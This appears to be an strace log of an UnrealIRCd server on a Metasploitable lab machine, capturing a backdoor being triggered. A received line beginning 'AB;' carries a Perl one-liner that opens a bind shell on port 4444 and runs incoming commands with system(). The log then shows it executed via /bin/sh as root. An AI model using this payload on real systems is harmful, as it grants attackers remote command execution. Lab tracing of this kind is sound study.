4519  07:45:12.840451 select(1024, [2 3 4 7 9], [], NULL, {0, 420000}) = 1 (in [2], left {0, 250000})

4519  07:45:13.010311 clock_gettime(CLOCK_MONOTONIC, {3122, 827335674}) = 0

4519  07:45:13.010340 time(NULL)        = 1495626313

4519  07:45:13.010355 time(NULL)        = 1495626313

4519  07:45:13.010376 gettimeofday({1495626313, 10382}, NULL) = 0

4519  07:45:13.010394 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:45:13.010455 clock_gettime(CLOCK_MONOTONIC, {3122, 827469985}) = 0

4519  07:45:13.010470 gettimeofday({1495626313, 10475}, NULL) = 0

4519  07:45:13.010485 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:45:13.010544 clock_gettime(CLOCK_MONOTONIC, {3122, 827559071}) = 0

4519  07:45:13.010560 accept(2, 0, NULL) = 5

4519  07:45:13.010586 getpeername(5, {sa_family=AF_INET, sin_port=htons(41693), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:45:13.010628 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:45:13.010676 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:45:13.010698 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:45:13.010843 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:45:13.010879 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:45:13.010895 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:45:13.010917 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:45:13.010939 clock_gettime(CLOCK_MONOTONIC, {3122, 827955040}) = 0

4519  07:45:13.010956 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:45:13.010974 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:45:13.010988 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:45:13.011002 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:45:13.011017 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:45:13.011040 send(6, "\214\335\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:45:13.011171 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:45:13.011217 gettimeofday({1495626313, 11223}, NULL) = 0

4519  07:45:13.011234 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:45:13.015875 clock_gettime(CLOCK_MONOTONIC, {3122, 832911796}) = 0

4519  07:45:13.015915 recvfrom(6, "\214\335\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\240\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:45:13.015981 close(6)          = 0

4519  07:45:13.016003 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:45:13.016023 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:45:13.016153 time(NULL)        = 1495626313

4519  07:45:13.016213 time(NULL)        = 1495626313

4519  07:45:13.016232 gettimeofday({1495626313, 16237}, NULL) = 0

4519  07:45:13.016263 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:45:13.016391 clock_gettime(CLOCK_MONOTONIC, {3122, 833406944}) = 0

4519  07:45:13.016408 gettimeofday({1495626313, 16413}, NULL) = 0

4519  07:45:13.016423 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [9], left {0, 720000})

4519  07:45:13.286914 clock_gettime(CLOCK_MONOTONIC, {3123, 103923209}) = 0

4519  07:45:13.286914 recv(9, "PRIVMSG  #testit3 Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 55

4519  07:45:13.286916 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.286937 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.286953 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.286967 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.286981 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287004 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287018 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287031 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287045 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287059 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287072 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287086 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287099 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287113 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287126 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287140 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287154 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287167 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287181 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287196 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287210 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287224 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 620000}, ...}) = 0

4519  07:45:13.287243 gettimeofday({1495626313, 287247}, NULL) = 0

4519  07:45:13.287264 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:45:13.287347 clock_gettime(CLOCK_MONOTONIC, {3123, 104360233}) = 0

4519  07:45:13.287359 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:45:13.287388 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:45:13.287409 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:45:13.287421 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:45:13.287436 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 13006

13006 07:45:13.287504 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

13006 07:45:13.287519 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

13006 07:45:13.287530 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

13006 07:45:13.287543 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

13006 07:45:13.287651 brk(0)            = 0x80f9000

13006 07:45:13.287675 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13006 07:45:13.287695 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f31000

13006 07:45:13.287711 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

13006 07:45:13.287729 open("/etc/ld.so.cache", O_RDONLY) = 1

13006 07:45:13.287742 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

13006 07:45:13.287769 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f29000

13006 07:45:13.287781 close(1)          = 0

13006 07:45:13.287792 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13006 07:45:13.287807 open("/lib/libncurses.so.5", O_RDONLY) = 1

13006 07:45:13.287821 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

13006 07:45:13.287920 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

13006 07:45:13.287938 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ef9000

13006 07:45:13.287951 mmap2(0xb7f26000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f26000

13006 07:45:13.287967 close(1)          = 0

13006 07:45:13.287980 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13006 07:45:13.287994 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

13006 07:45:13.288008 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

13006 07:45:13.288098 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

13006 07:45:13.288116 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ef5000

13006 07:45:13.288127 mmap2(0xb7ef7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ef7000

13006 07:45:13.288142 close(1)          = 0

13006 07:45:13.288153 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13006 07:45:13.288167 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

13006 07:45:13.288181 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

13006 07:45:13.288281 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

13006 07:45:13.288298 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef4000

13006 07:45:13.288312 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da5000

13006 07:45:13.288323 mmap2(0xb7eee000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7eee000

13006 07:45:13.288338 mmap2(0xb7ef1000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ef1000

13006 07:45:13.288352 close(1)          = 0

13006 07:45:13.288374 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7da4000

13006 07:45:13.288386 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7da46b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

13006 07:45:13.288442 mprotect(0xb7eee000, 4096, PROT_READ) = 0

13006 07:45:13.288478 munmap(0xb7f29000, 29913) = 0

13006 07:45:13.288504 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

13006 07:45:13.288518 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

13006 07:45:13.288538 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfc63620) = -1 ENOTTY (Inappropriate ioctl for device)

13006 07:45:13.288568 brk(0)            = 0x80f9000

13006 07:45:13.288578 brk(0x80fa000)    = 0x80fa000

13006 07:45:13.288589 brk(0x80fb000)    = 0x80fb000

13006 07:45:13.288605 getuid32()        = 0

13006 07:45:13.288614 getgid32()        = 0

13006 07:45:13.288623 geteuid32()       = 0

13006 07:45:13.288632 getegid32()       = 0

13006 07:45:13.288646 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

13006 07:45:13.288659 time(NULL)        = 1495626313

13006 07:45:13.288672 brk(0x80fc000)    = 0x80fc000

13006 07:45:13.288686 brk(0x80fd000)    = 0x80fd000

13006 07:45:13.288706 open("/proc/meminfo", O_RDONLY) = 1

13006 07:45:13.288727 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

13006 07:45:13.288745 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f30000

13006 07:45:13.288786 read(1, "MemTotal:      1035240 kB\nMemFree:        292028 kB\nBuffers:         91408 kB\nCached:         490224 kB\nSwapCached:          0 kB\nActive:         258428 kB\nInactive:       452164 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        291788 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            3896 kB\nWriteback:           0 kB\nAnonPages:      128968 kB\nMapped:          52008 kB\nSlab:            21560 kB\nSReclaimable:    12624 kB\nSUnreclaim:       8936 kB\nPageTables:       1960 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

13006 07:45:13.288889 close(1)          = 0

13006 07:45:13.288900 munmap(0xb7f30000, 4096) = 0

13006 07:45:13.288912 brk(0x80fe000)    = 0x80fe000

13006 07:45:13.288941 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

13006 07:45:13.288954 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

13006 07:45:13.288966 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

13006 07:45:13.288978 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

13006 07:45:13.288989 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

13006 07:45:13.289001 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

13006 07:45:13.289014 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

13006 07:45:13.289026 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

13006 07:45:13.289039 uname({sys="Linux", node="metasploitable", ...}) = 0

13006 07:45:13.289091 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

13006 07:45:13.289110 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

13006 07:45:13.289128 brk(0x8100000)    = 0x8100000

13006 07:45:13.289140 getcwd("/etc/unreal", 4096) = 12

13006 07:45:13.289154 getpid()          = 13006

13006 07:45:13.289170 getppid()         = 4519

13006 07:45:13.289186 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

13006 07:45:13.289205 stat64("/sbin/sh", 0xbfc635f8) = -1 ENOENT (No such file or directory)

13006 07:45:13.289218 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

13006 07:45:13.289235 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

13006 07:45:13.289271 socket(PF_FILE, SOCK_STREAM, 0) = 1

13006 07:45:13.289285 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

13006 07:45:13.289296 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

13006 07:45:13.289319 close(1)          = 0

13006 07:45:13.289330 socket(PF_FILE, SOCK_STREAM, 0) = 1

13006 07:45:13.289340 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

13006 07:45:13.289351 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

13006 07:45:13.289369 close(1)          = 0

13006 07:45:13.289382 open("/etc/nsswitch.conf", O_RDONLY) = 1

13006 07:45:13.289397 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

13006 07:45:13.289413 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f30000

13006 07:45:13.289425 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

13006 07:45:13.289474 read(1, "", 4096) = 0

13006 07:45:13.289484 close(1)          = 0

13006 07:45:13.289493 munmap(0xb7f30000, 4096) = 0

13006 07:45:13.289510 open("/etc/ld.so.cache", O_RDONLY) = 1

13006 07:45:13.289522 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

13006 07:45:13.289538 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f29000

13006 07:45:13.289548 close(1)          = 0

13006 07:45:13.289559 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13006 07:45:13.289573 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

13006 07:45:13.289588 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

13006 07:45:13.289678 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

13006 07:45:13.289696 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d9b000

13006 07:45:13.289707 mmap2(0xb7da2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7da2000

13006 07:45:13.289728 close(1)          = 0

13006 07:45:13.289740 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13006 07:45:13.289762 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

13006 07:45:13.289776 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

13006 07:45:13.289865 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

